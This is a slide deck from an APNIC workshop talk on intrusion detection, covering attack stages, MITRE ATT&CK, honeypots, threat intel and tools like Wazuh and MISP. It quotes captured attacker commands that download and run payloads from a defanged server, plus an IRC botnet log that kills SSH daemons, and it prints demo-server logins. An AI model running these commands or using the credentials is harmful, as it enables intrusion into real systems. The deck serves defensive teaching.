APNIC Senior Security Specialist Adli Wahid presents an Introduction to Intrusion Detection at the 2023 NCIT, held in Suva, Fiji from 17 to 18 August 2023.

1. Introduction to Intrusion
Detection
Adli Wahid
adli@apnic.net

2. Let’s Connect!
Adli Wahid (LinkedIn)

3. The Plan
oObjectives
oAwareness about how threats are executed
oImportance of knowledge driven security
oThinking Process
oNot focusing on specific tools**
oDetection
oUnderstanding Attacks
oExamples
oLet’s make this interactive

4. We are Under Attack!

5. Perspective & Context
• Successful or Attempts
• Example:
oActual Login OR
oPort scanning
• Example
• Actual Login AND / OR
• Download & Execute payload
• Other aspects
• Targeted Assets, Source of Attack, Timing,
Files/Artifacts

6. Where does it fit?
Identify Protect Detect Respond Recover
NIST Cyber Security Framework (v1)
6

7. Detection
• Key concept in security monitoring, ”detection
engineering”
• Know Your Enemy
• You are the target
• Attacker have capabilities & motives
• Provide Assurance
• Important to understand the different threats
and how they are executed
• Detect implies
• monitoring and knowing what to monitor by
someone
• Being alerted when something happens
• Stages of attack
• Drive action
• Or Policy Change (POST)
• MITRE ATTACK Framework

8. Observing Attacks
• From APNIC Community Honeynet Project

9. Multiple Stages
• Typical
o Scanning
o Initial Access
o Execution
o Initial infection
o Actual Payload
o Persistence
• Architecture
• Initial Host
• Serving Payload
• Command & Control
• Managing
X
Target 1
Target
2
9

10. Knock, Knock!
Timestamp, src_ip, username_attempted, password_attempted
2022-01-13T01:05:26.128718, 117.111.1.143,root,root
2022-01-13T01:18:41.854533, 117.111.1.145,root,root
2022-01-13T05:39:01.444840, 117.111.1.250,root,root
2022-01-13T05:49:50.868138, 117.111.1.139,root,root
2022-01-13T06:24:06.955896, 117.111.1.183,root,root
2022-01-13T08:48:02.869449, 117.111.1.233,root,root
2022-01-13T11:04:05.756191, 117.111.1.168,root,root
2022-01-13T12:29:53.474695, 117.111.1.46,root,root
2022-01-13T12:57:57.219175, 117.111.1.60,root,root
2022-01-13T13:12:33.592252, 117.111.1.186,root,root
10

11. Once Inside
Src_ip, URL
58.212.107.27,hxxp://61.177.137.133/x/1sh,CN
67.172.200.77,hxxp://61.177.137.133/x/1sh,US
93.131.187.222,hxxp://61.177.137.133/x/1sh,DE
94.224.178.41,hxxp://61.177.137.133/x/1sh,BE
103.125.154.119,hxxp://61.177.137.133/x/1sh,IN
109.219.53.72,hxxp://61.177.137.133/x/1sh,FR
112.53.197.138,hxxp://61.177.137.133/x/1sh,CN
117.111.1.202,hxxp://61.177.137.133/x/1sh,KR
150.101.96.34,hxxp://61.177.137.133/x/1sh,AU
11
B
B
B
B
B
S
T T
B – Bots
T – Target
S – Payload Server

12. Execution – The Script
wget hxxp://61.177.137.133/x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 777
/var/run/tty0 ; /var/run/tty0 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 777
/var/run/tty1 ; /var/run/tty1 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 777
/var/run/tty2 ; /var/run/tty2 > /dev/null 2>&1 &
wget hxxp://61.177.137.133/x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 777
/var/run/tty3 ; /var/run/tty3 > /dev/null 2>&1 &
12

13. Communication with Command and Control
Server
1. Malware Download
05/25/2021-02:14:51.304265 [**] [1:2019240:14] ET POLICY Executable
and linking format (ELF) file download Over HTTP [**] [Classification:
Potential Corporate Privacy Violation] [Priority: 1] {TCP} 71.127.148.69:80 ->
10.0.2.15:39526
2. IRC Communication
05/25/2021-02:14:53.336178 [**] [1:2000345:16] ET MALWARE IRC Nick
change on non-standard port [**] [Classification: A Network Trojan was
detected] [Priority: 1] {TCP} 10.0.2.15:54206 -> 202.28.32.30:8080
13

14. C2
B B
B
B B
NICK x86|x|1|919043|server
USER x00 localhost localhost :2021g
:IRC!IRC@0x.01 PRIVMSG x86|x|1|919043|server :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
:x86|x|1|919043|server!x00@x.y.z.k JOIN :#0x86
:bot!.@. PRIVMSG #0x86 :!* SH ( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service
sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 &
NOTICE bot :
:0x.01 412 x86|x|1|919043|server :No text to send
S
?
IRC Communication (2)
14

15. Adversary Tactic & Techniques
• Framework / Knowledge Base of adversary tactic (goals) and
techniques (the how) based on real observation
• Helps the defender to have realistic threat awareness
• Website https://attack.mitre.org/
• Different Focus / Views
• Enterprise, Mobile, ICS
• Mitigations
• Groups **

16. What Are The Detection Opportunities?
• System / Host
• Service
• Disk
• RAM
• Network
• Src/DST, Payload, Certificates
• What are other important artifacts?
• URLs, Binaries/Files, Hashes
• What tools can we use
• How can we confirm?

17. Threat Intel Databases
• Purpose:
o Look up your own assets
o Indicators that you can use to monitor (hunt)
• Free & Commercial
• We can use it to look things up
o www.virustotal.com
o https://www.dshield.org/
o Many AVs/EDRs/CTI companies have subscriptions
• Community based – i.e. CERTs/CSIRT community uses MISP
• https://www.misp-project.org/
• Webinar on Threat Intel Sharing
• Automation
https://pastebin.com/K8nGtVYt

18. File Integrity Monitoring
• Changes to disk
• Is it authorized? What is it?
o /etc/resolv.conf
o New Crontab entries
o Registry
• What if file is deleted immediately by attacker after execution?
• It can be recovered (if system is running) /proc
• Activities can be observed (on system or from RAM)
• What tools can we use?
• AV / EDR
• Centralized logging – Sysmon, filebeats + Elasticsearch + create rules + Alerting
• Wazuh

19. Other Activities On Host
• Adding / Removing /Modifying
• Users
• Services
• Applications
• Files
• Config
• CPU / Process
• Going Deeper ***
oProfiling attacks
oAttribution

20. Network
• Compromised host need to call home!
• Detection based on content/headers of network packets
o (Known) Exploits
o Threat Intel
o IP / Domain is Command & Control
o IP is a TOR Exit node
o Details in CERTIFICATEs during TSL handshake session
• Network Intrusion Detection System
• Packet capture / Dissector + Signature matching + threat intel
• Suricata *** / Zeek
• Arkime

21. Encrypted Traffic

22. It’s always the DNS
• DNS
oIf host is looking up known malicious or suspicious domain
oEven if it is block or prevented **
oDo you have visibility of the DNS
• Scenario
• One host compromised
• DNS query to monero.miningpool.zyx
• Question – is there any other host that has been compromised?

23. Honeypots & Honey Tokens
• How do we know if attackers are in our infrastructure?
• Exploit attackers activities
o Lateral movement – scan and/or connect to other services
o Accessing documents, files , starting service
• Honeypots
o Emulate services that has no production value
o Any access is suspect (no / very low false positive)
o Monitor for attempts to access / exploit
o Open source & Commercial solutions available
• Honeytokens
o Digital artifacts that has no production value
o Once accessed/loaded/open we will get an alert
Scan For Server Config

24. HoneyTokens
www.canarytokens.org

25. Detection by Others
• IPs from your network scanning/attacking other hosts on the
Internet
• One of your server hosting malware
• Database from one of your server is on the darkweb
• Stolen credentials from password stealers or botnet
• Someone discover a vulnerability on your website **
• Proactively looking for these things is possible
• Let other security teams, researchers notify you
• But How?
Haveibeenpwned.com
Shodan.io

26. Get Notified
Shodan.io
Haveibeenpwned.com
Daily Scans with API

27. Security.txt
• Security Contact information on your website
• www.yourdomain.com/security.txt
• Basically information – on how to contact the security person in
charge + what is the scope + PGP keys
• www.securitytxt.org

28. CERT/CSIRT
• Dedicated team for dealing with incidents
• Monitor emails
• Integrate with ticketing system / Slack alert etc
• Process in places for processing the report
• National CERT/CSIRT would normally be contacted by other external
or international teams
• www.apcert.org
• www.first.org
• In the absence of one maybe sure you are reachable
• WHOIS IP
• WHOIS Domain

29. Wrapping UP
• Detection is a critical concept
o Mitigate attack in progress
o Improve security policies / Better Controls
o Awareness
• Implies knowledge in attacker techniques and tactics
o Analysts needed!
• Coverage / Visibility
o Due to limitation of tech or blind spot
• Detection technologies – signature based have limitations
• AI?
• Note: Attackers are human J
• Incident Response Plan
o Practice
o Trusted Network
• Dealing with unknown
• Using MITRE Attack Framework
• Allocate for regular learning / conference / sharing

30. Learning More
• Check out some free courses with Labs on
https://academy.apnic.net
oSecurity Monitoring
oHoneypot
o Suricata IDS 101
oThreat Intel Sharing Webinar

31. Day #5
• Recap of Day #4
• Traffic light protocol
• Systems / Demo
o Wazuh
oDFIR-IRIS (Case Management)
oMISP – Community Wide Sharing
• Operation Security
• Moving Forward
sudo shutdown –h now

32. Day 4 Recap
• MITRE Attack Framework
• Understanding stages of attack
• Break down into Tactic & Teqniques
• Breack down by platform (Linux, Windows, etc)
• Detection!
• Mapping with groups, integration with Tools etc etc
oLabs
o Memory Dump & Packet Analysis
o Volatility
o Suricata (IDS / Packet Analysis)
o Artifacts, Indicators of Compromise Extraction
o academy.apnic.net
o Future workshops?

33. Sharing - Rules of Engagement
• Important for building trust!
o Need to know basis
• Telling others:
• How the information should be handled
• Our expectation
• Who can they share it with
• Enforcement
• By systems i.e. to prevent accidental leak
• How
• Label & Warning
• CERT /CSIRT Community - Traffic Light Protocol (TLP)

34. FIRST.org Traffic Light Protocol -
https://www.first.org/tlp/

37. Tools for Enabling Sharing (and Investigation)
EDR / SIEM
/etc /
Security
Monitoring
Case /
Incident
Management
INTERNAL
Community
Threat
Sharing
Platform
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines

38. Tools for Enabling Sharing (and Investigation)
Wazuh DFIR-IRIS
INTERNAL
MISP
Community
Other
Community
Threat
Sharing
Platform
Threat Intel DB for
enrichment
Analysis Engines

39. Wazuh
owww.wazuh.com
oSIEM / EDR – Free & Open Source
oFile Integrity Monitoring
oAuthentication
oIntegration with other tools (i.e. Suricata, Yara)
oActive Respone
oAgent / Agentless ***
oIntegration with TI to enrich IOC (Indicators of Compromise)
oOther – Vulnerability, Compliance,
oAPIs – send data to other platforms

40. Wazuh
• File Integrity Monitoring
• VirusTotal (API needed)
• Suricata Alerts
• Authentication
• Vulnerability Management
https://wazuh.honeynet.asia
admin
SecretPassword

41. DFIR-IRIS
• Track Elements observed during investigation
• Collaboration - share pieces of information between analysts
• Automation i.e. Enrichment of IOCs

42. DFIR-IRIS
• Adding Cases from investigation
• Adding IOCs
• Asset Link
• Assigning Task
• Timeline
• Integration with other tools
• VT / MISP for enrichment
https://iris.honeynet.asia
User: alice
Password: FijiWorkshop2023
User: bob
Password: FijiWorkshop2023

43. MISP
• Threat Sharing Platform for Community
• Open Source and Free
• Many Community Uses it
• Demo
• Adding Events
• Adding Attributes
• Other features of the tool
https://misp.honeynet.asia
Username:
fijiworkshop@company.com
FijiWorkshop2023

44. Operational Security
• Ethical (https://www.ethicsfirst.org)
• Dealing with malicious activities and criminal infrastructure
• Dedicate device / VM
o Network
o i.e. accidentally executing malware in the network
• VPN / TOR
• Anonymising IP address
• Tor-project.org
• Quick Demo using torify
• Encryption
• Email: PGP**
• Other Channels
• Slack, Signal, Keybase

45. Moving Forward – FJ Critical Infrastructure
Group
• Rethink about improving your security
o https://github.com/certsocietegenerale/IRM
o https://ciso-ksp.kpnnet.org/framework/KSP
o https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf
• Setting up this community and group
• What we need :
1. Rules of engagement (i.e TLP) and Expectations
2. Regular Activities
3. Infrastructure – web, email, servers
4. Volunteers
5. Planning for future events
6. Initiatives / Problems to address (Minimum security / Vuln)
7. Engagements
• Who else should we invite and convince to join J
• Who can contribute?

46. Discussion
Contact
adli@apnic.net
Adli Wahid on LinkedIN

47. Thank You
Adli Wahid (LinkedIn)
adli@apnic.net
www.apnic.net